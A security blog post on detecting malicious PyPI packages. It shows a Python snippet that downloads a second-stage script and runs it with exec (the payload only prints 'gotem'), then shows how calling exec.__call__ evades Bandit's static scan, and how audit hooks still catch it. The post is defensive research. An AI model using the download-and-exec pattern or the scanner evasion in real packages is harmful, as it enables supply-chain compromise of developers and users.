Overview

Myself and plenty of others have spoken about the increasing amount of malicious packages masquarading as legitimate in Python’s PyPi package repository. These packages end up as dependecies to legitimate programs, compromising developers and end users.

A common pattern in these packages is to download a 2nd stage script from the web, then passing it into eval or exec to execute the 2nd stage, for example:


import urllib.request
script = urllib.request.urlopen("https://gist.githubusercontent.com/pathtofile/0e26c9a82c08c4da44f5d2c32db85005/raw").read()
exec(script)   # script == "print('gotem')"

Detection

One way to detect this type of attack to scan packages using PyCQA’s Bandit. This is a static analysis tool, and can be used to scan projects and files to security issues. One of the issues it can scan for it B307 - use of exec. Running it over a file containing the above snipped produces the following output

$> bandit suspicious.py
[main]  INFO    profile include tests: None
[main]  INFO    profile exclude tests: None
[main]  INFO    cli include tests: None
[main]  INFO    cli exclude tests: None
[main]  INFO    running on Python 3.8.0
[node_visitor]  INFO    Unable to find qualified name for module: suspicious.py
Run started:2020-01-12 09:32:50.575932

Test results:
>> Issue: [B310:blacklist] Audit url open for permitted schemes. Allowing use of file:/ or custom schemes is often unexpected.
   Severity: Medium   Confidence: High
   Location: suspicious.py:2
   More Info: https://bandit.readthedocs.io/en/latest/blacklists/blacklist_calls.html#b310-urllib-urlopen
1       import urllib.request
2       script = urllib.request.urlopen("https://gist.githubusercontent.com/pathtofile/0e26c9a82c08c4da44f5d2c32db85005/raw").read()
3       exec(script)   # prints 'gotem'

--------------------------------------------------
>> Issue: [B102:exec_used] Use of exec detected.
   Severity: Medium   Confidence: High
   Location: suspicious.py:3
   More Info: https://bandit.readthedocs.io/en/latest/plugins/b102_exec_used.html
2       script = urllib.request.urlopen("https://gist.githubusercontent.com/pathtofile/0e26c9a82c08c4da44f5d2c32db85005/raw").read()
3       exec(script)   # prints 'gotem'

--------------------------------------------------

Code scanned:
        Total lines of code: 3
        Total lines skipped (#nosec): 0

Run metrics:
        Total issues (by severity):
                Undefined: 0.0
                Low: 0.0
                Medium: 2.0
                High: 0.0
        Total issues (by confidence):
                Undefined: 0.0
                Low: 0.0
                Medium: 0.0
                High: 2.0
Files skipped (0):

We can see it picked up on two things:

  1. The use of urllib.request.urlopen to get data from the internet
  2. The use of exec

Both of these things might be legitimate: If you use a tool such as my Bandit Scan to scan PyPi, you’ll quickly see that plenty of legitimate packages use for urlopen and exec all the time.

Bandit does have a very useful --baseline option, that enables you compare a package to a “trusted good” version. This enables developers to scan for any changes to dependecies, and only investigate if this change, drastically reducing the noise.

Evasion

Bandit does currently suffer from one flaw however. If we instead change our dodgy code to:

sneaky = 'import urllib.request; script = urllib.request.urlopen("https://gist.githubusercontent.com/pathtofile/0e26c9a82c08c4da44f5d2c32db85005/raw").read(); exec(script)'
exec.__call__(sneaky)

And run bandit again, we get:

$>bandit suspicious_sneaky.py
[main]  INFO    profile include tests: None
[main]  INFO    profile exclude tests: None
[main]  INFO    cli include tests: None
[main]  INFO    cli exclude tests: None
[main]  INFO    running on Python 3.8.0
[node_visitor]  INFO    Unable to find qualified name for module: suspicious_sneaky.py
Run started:2020-01-12 09:34:24.153035

Test results:
        No issues identified.

Code scanned:
        Total lines of code: 2
        Total lines skipped (#nosec): 0

Run metrics:
        Total issues (by severity):
                Undefined: 0.0
                Low: 0.0
                Medium: 0.0
                High: 0.0
        Total issues (by confidence):
                Undefined: 0.0
                Low: 0.0
                Medium: 0.0
                High: 0.0
Files skipped (0):

Our code is now listed as benign by Bandit. This is due to Bandit only looking for direct uses of the exec function, and not us calling the function’s internal __call__ function (which effectively does the same thing).

I currently have a pull request to fix this, which will also flag any other uses of __call__, as this is not usual to do.

Python 3.8 Audit Hooks

On top of static analysis, using Python 3.8’s audit hooks to analyse code as it runs would also surface the dodgy behaviour.

If you subscribe the python audit hook, such as using my PyAuditLogger, and run the suspicious_sneaky.py file, you will get (amungst other things) these events:

<EventData>
  <Data>PID: 15744</Data> 
  <Data>Commandline: python.exe suspicious_sneaky.py</Data> 
  <Data>Event: compile</Data> 
  <Data>b'print("gotem")'</Data> 
  <Data>'<string>'</Data> 
</EventData>

<EventData>
  <Data>PID: 15744</Data> 
  <Data>Commandline: python.exe suspicious_sneaky.py</Data> 
  <Data>Event: socket.connect</Data> 
  <Data><socket.socket fd=832, family=AddressFamily.AF_INET, type=SocketKind.SOCK_STREAM, proto=0></Data> 
  <Data>('151.101.64.133', 443)</Data> 
</EventData>

<EventData>
  <Data>PID: 15744</Data> 
  <Data>Commandline: python.exe suspicious_sneaky.py</Data> 
  <Data>Event: socket.getaddrinfo</Data> 
  <Data>'gist.githubusercontent.com'</Data> 
  <Data>443</Data> 
  <Data>0</Data> 
  <Data>1</Data> 
  <Data>0</Data> 
</EventData>

Highlighting in plain-view we connected to gist.githubusercontent.com, got some data from it, and eventually ran print("gotem"). The downside to the Audit hooks is again fiding the interesting things in the sheer volume of data. But only looking at the compile, socket, and exec events could be a good place to start, especially if events going into a SIEM.

Conclusion

By combining dynamic and static code analysis, we stand a good chance of detecting suspicious beheaviour in Python Packages. But there is a real and ongoing challenge of finding the dodgy-needle in the haystack that is millions of packages across PyPi.